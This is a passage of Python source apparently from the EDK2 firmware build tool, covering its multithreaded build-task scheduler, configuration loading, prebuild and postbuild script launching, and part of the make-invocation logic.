while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other threads, we have to
# use threading.Event to communicate this information to the main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other threads, we have to
# use a static variable to communicate this message to the main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. If so,
# it just returns the associated BuildTask object from the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
if self.BuildItem.BuildObject in GlobalData.gModuleBuildTracking and not BuildTask._ErrorFlag.isSet():
GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject] = True
# indicate a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildThread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildThread.setName("build thread")
self.BuildThread.setDaemon(False)
self.BuildThread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse the platform,
# modules and packages, and then establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
# Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
self.Db = WorkspaceDatabase()
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot characters while doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile):
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
            if os.path.isfile(ToolDefinitionFile):
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
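    # Illustrative resolution (assumed values, summarizing the precedence above):
    # command-line options win, then target.txt, then discovery in the current
    # directory. For example, with no -a/-b/-t given and a target.txt containing
    #   TARGET_ARCH       = IA32 X64
    #   TARGET            = DEBUG
    #   TOOL_CHAIN_TAG    = MYTOOLS
    # self.ArchList becomes ('IA32', 'X64'), self.BuildTargetList ['DEBUG'] and
    # self.ToolChainList ['MYTOOLS'], provided MYTOOLS is defined in
    # tools_def.txt ('MYTOOLS' here is a hypothetical tag).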
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
        # Allow case-insensitive file names from the command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
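    # Illustrative example (hypothetical values, ignoring the GlobalData.gCommand
    # words that are prepended first): if none of -b/-a/-t/-p were given on the
    # original command line and BuildTarget=['DEBUG'], TargetArch=('IA32',),
    # ToolChain=['GCC5'], PlatformFile='MyPkg/MyPkg.dsc', Target='fds', the
    # method appends roughly
    #   ' -b DEBUG -a IA32 -t GCC5 -pMyPkg/MyPkg.dsc --conf=<ConfDir> fds'
    # (note the attached '-pFILE' form produced by the concatenation above).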
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
            # The .PrebuildEnv file captures environment variable settings made by
            # the prebuild script and preserves them for the rest of the main build
            # step. The child process environment evaporates as soon as the process
            # exits, so we cannot read it directly during the build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
            if Process.returncode != 0:
                EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process failed!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
                # Each line is "NAME=value"; keep only well-formed pairs, stripped
                envs = [l.split("=", 1) for l in envs]
                envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
            if Process.returncode != 0:
                EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process failed!')
EdkLogger.info("\n- Postbuild Done -\n")
## Error handling for hash feature
#
    # On BuildTask error, iterate through the module build tracking
    # dictionary to determine whether a module failed to build. Invalidate
    # the hash associated with that module by removing it from storage.
    #
def invalidateHash(self):
# GlobalData.gModuleBuildTracking contains only modules that cannot be skipped by hash
for moduleAutoGenObj in GlobalData.gModuleBuildTracking.keys():
            # False == FAIL : True == Success
            # Skip invalidating for successful module builds
            if GlobalData.gModuleBuildTracking[moduleAutoGenObj]:
                continue
            # The module failed to build or failed to start building; from this
            # point on, remove its .hash files
if GlobalData.gUseHashCache:
ModuleHashFile = path.join(moduleAutoGenObj.BuildDir, moduleAutoGenObj.Name + ".hash")
if os.path.exists(ModuleHashFile):
os.remove(ModuleHashFile)
# Remove .hash file from cache
if GlobalData.gBinCacheDest:
FileDir = path.join(GlobalData.gBinCacheDest, moduleAutoGenObj.Arch, moduleAutoGenObj.SourceDir, moduleAutoGenObj.MetaFile.BaseName)
HashFile = path.join(FileDir, moduleAutoGenObj.Name + '.hash')
if os.path.exists(HashFile):
os.remove(HashFile)
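    # Illustrative cache layout (hypothetical module 'Foo' under MyPkg, X64):
    # the two files removed above would be
    #   <BuildDir of Foo>/Foo.hash
    #   <BinCacheDest>/X64/MyPkg/Foo/Foo/Foo.hash
    # Removing them guarantees the next build cannot skip the failed module
    # based on a stale hash.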
## Build a module or platform
#
    # Create AutoGen code and makefile for a module or platform, and then launch
    # the "make" command to build it
    #
    #   @param  Target                      The target of build command
    #   @param  AutoGenObject               The platform or module AutoGen object
    #   @param  CreateDepsCodeFile          Flag used to indicate creating code
    #                                       for dependent modules/Libraries
    #   @param  CreateDepsMakeFile          Flag used to indicate creating makefile
    #                                       for dependent modules/Libraries
    #   @param  BuildModule                 Flag used to indicate building a module instead of a platform
    #   @param  FfsCommand                  FFS commands to be embedded in the generated makefile
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
        # skip file generation for the cleanxxx, run and fds targets
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for targets that must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
